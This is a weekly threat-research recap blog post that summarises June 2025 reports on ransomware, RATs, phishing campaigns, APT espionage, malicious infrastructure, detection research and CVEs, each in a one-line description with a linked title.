Threat Research | Weekly Recap [16 Jun 2025]

Ransomware Trends & Notable Incidents

• May 2025 Ransomware Overview: Decline in new ransomware samples globally with notable activity in Korea and financial sectors, highlighting ongoing risks from groups like Arkana and LockBit. May 2025 Threat Trend Report on Ransomware
• Fog Ransomware Attack: Unusual ransomware targeting Asian financial institution using employee monitoring and open-source pentesting tools, suggesting espionage motives. Fog Ransomware: Unusual Toolset Used in Recent Attack
• Spectra Ransomware Emerges: New ransomware evolving from Chaos family, using double extortion and targeting Windows systems requesting $5,000 Bitcoin ransom. The Spectre of SpectraRansomware
• SimpleHelp RMM Exploited for Ransomware: Vulnerability CVE-2024-57727 abused to compromise utility billing software providers, prompting urgent mitigation advisories by CISA. Ransomware Actors Exploit Unpatched SimpleHelp RMM
• Play Ransomware TTPs Updated: New advisory reveals Play ransomware’s evolving tactics including custom tools Grixba and AlphaVSS, supporting double extortion campaigns. Updated Response to CISA Advisory on Play Ransomware
• Black Basta Legacy Continues: Despite disbanding, former members and groups persist with phishing and Python-based payload delivery techniques emphasizing user vigilance. Gone But Not Forgotten: Black Basta’s Enduring Legacy

Malware and RAT Campaigns

• DCRat Targets Blockchain Users: Multi-stage Trojan deployed via Telegram using decoy Lnk files and signed DLLs to evade detection. DCRat Targeting Blockchain Users
• CyberEye Telegram RAT: Modular .NET RAT leveraging Telegram Bot API enabling credential theft, Windows Defender evasion, and persistence via scheduled tasks. Understanding CYBEREYE RAT Builder
• AsyncRAT & Skuld Stealer via Discord: Malware campaign hijacking expired Discord invites to deliver multi-stage payloads stealing cryptocurrency wallet data. From Trust to Threat: Hijacked Discord Invites
• GrayAlpha Deploys PowerNet Loader and NetSupport RAT: Cybercriminal group uses diverse infection vectors including custom loaders, highlighting need for robust allow-listing and training. GrayAlpha Uses Diverse Infection Vectors
• Winos 4.0 Backdoor in Japan: Operation Holding Hands uses stolen certs and advanced runtime decryption tied to China-linked APT Silver Fox. Winos 4 0 Behind Operation Holding Hands
• Sora AI Clickbait Infostealer: Malware masquerades as OpenAI tool, exfiltrating extensive user data via GitHub and Telegram infrastructure. Sora AI Clickbait Infostealer

Phishing, Social Engineering, and Supply Chain Threats

• PagoPA-themed Phishing Surge in Italy: CERT-AGID detects 45 campaigns exploiting mobile users with conditional redirections for fraudulent payments. Increase in PagoPA Phishing Campaigns
• SharePoint Phishing Exploits Trusted Links: Sophisticated multi-step phishing leveraging SharePoint and Microsoft platforms to bypass security and steal credentials. SharePoint Phishing Exploits Trusted Links
• Adversary-in-the-Middle Phishing Gaining Ground: PhaaS kits used to hijack Microsoft 365 and Google sessions, circumvent MFA, aiding fraud and BEC attacks. Global Analysis of AitM Phishing Threats
• TeamFiltration Account Takeover Campaign: Large-scale password spraying against Microsoft Entra ID accounts using AWS infrastructure and pentesting tools. Attackers Unleash TeamFiltration Campaign
• BlackSuit Social Engineering Evolves: Post-Black Basta, affiliates deploy Java RAT and QEMU malware linked to cloud C2s, continuing advanced phishing operations. BlackSuit Continues Social Engineering Attacks
• Supply Chain Risks & Rogue Raspberry Pi: ClickFix social engineering tricks end users into running malicious PowerShell commands, exploited by APT28 and MuddyWater. Proactive OT Security: Supply Chain Risks

APT and Cyber Espionage Activity

• Transparent Tribe Deploys DISGOMOJI on Linux: APT-C-56 uses Golang malware with Google services for C2, targeting Indian government and military personnel. Transparent Tribe DISGOMOJI Targeting Linux
• Stealth Falcon’s Zero-Day Campaign: Targeting Middle Eastern sectors via CVE-2025-33053 and custom implants including Horus Agent, employing spear-phishing and WebDAV exploits. CVE-2025-33053, Stealth Falcon and Horus
• MISSION2025 (APT41) Active Globally: Chinese state actor focuses on cyber espionage and financially motivated attacks using cloud-based C2 and vulns impacting governments and critical infrastructure. APT PROFILE – MISSION2025
• China-Nexus Threat Actors Target Top-tier Organizations: SentinelLabs identifies repeated reconnaissance and intrusion attempts linked to PurpleHaze and ShadowPad clusters against cybersecurity vendors. Follow the Smoke: China-nexus Threat Actors

Malicious Infrastructure & Tooling Highlights

• Nytheon AI – Uncensored LLM Platform: Tor-based malicious LLM platform supports spear-phishing and API-driven attacks, originating likely from Russian-speaking actors. Cato CTRL Threat Research: Nytheon AI
• JSFireTruck JavaScript Obfuscation Campaign: Large-scale injection of obfuscated JavaScript into legitimate sites redirects users to malware and unwanted content. JSFireTruck: Malicious JavaScript Obfuscation
• BrowserVenom Exploits DeepSeek Popularity: Malware uses phishing and malvertising to proxy browser traffic, stealing and manipulating data. Toxic Trend: Malware Targeting DeepSeek
• Skeleton Spider Employs Trusted Cloud Delivery: FIN6 uses job platforms and CAPTCHA evasion to spread Moreeggs backdoor linked to ransomware and credential theft. Skeleton Spider’s Trusted Cloud Malware Delivery
• DanaBleed Memory Leak Revealed: DanaBot malware platform’s C2 server bug leaked sensitive data until takedown during Operation Endgame. DanaBleed: DanaBot C2 Server Memory Leak Bug
• Predator Spyware Resurgence: Despite sanctions, Predator spyware operations expand to new regions with sophisticated infrastructure tied to Intellexa Consortium. Predator Still Active with New Links

Security Enhancements & Research Developments

• Elastic Call Stack for Malware Detection: New method identifies threat actors by enriching Windows call stacks with context to improve detection and hunting accuracy. Call Stacks: No More Free Passes For Malware
• MITRE ATT&CK Update: Introduction of seven new threat groups in 2025 with expanded IoCs enhancing detection via DNS and email analysis. New MITRE ATT&CK Groups for 2025
• Trend Vision One Threat Intelligence: Container-aware retrospective scanning and automated investigation accelerate response against emerging threats in complex environments. Stay Ahead of Cyber Threats Sweeping Container Telemetry
• Silent Push SOAR Integrations: Automated enrichment of threat indicators and orchestration with multiple SOAR platforms reduce manual triage and improve proactive defenses. Enhance Cybersecurity Workflows with Silent Push SOAR
• Operationalizing Threat Intelligence vs. Threat Hunting: Framework and strategy overview for integrating intelligence and hunting to detect sophisticated threats faster. Operationalizing Threat Intelligence vs. Threat Hunting

Vulnerabilities & Exploits Affecting Critical Systems

• Microsoft Defender for Identity Spoofing (CVE-2025-26685): An unauthenticated attacker can capture Net-NTLM hashes to escalate privileges in Active Directory environments. Spoofing to Elevate Privileges in MDI
• Ongoing High-Severity Exploits Found: Multiple vulnerabilities actively exploited across ICS, enterprise, and web systems, including China-linked APT activities. The Week in Vulnerabilities: Cyble Report

Emerging Threats in Browser Extensions & Cloud Platforms

• Malicious Browser Extensions Rising: Trust exploited in official stores for session hijacking, traffic manipulation, and credential theft; notable Chrome extension sold for $100k enables crypto draining. Growing Risk of Malicious Browser Extensions
• VexTrio Adtech Cabal: Complex alliances between malware actors and adtech companies facilitate large-scale website compromises and push notification scams. Vexing & Vicious: WordPress Hackers & Adtech

Threat Research | Weekly Recap – hendryadrian.com

Views: 38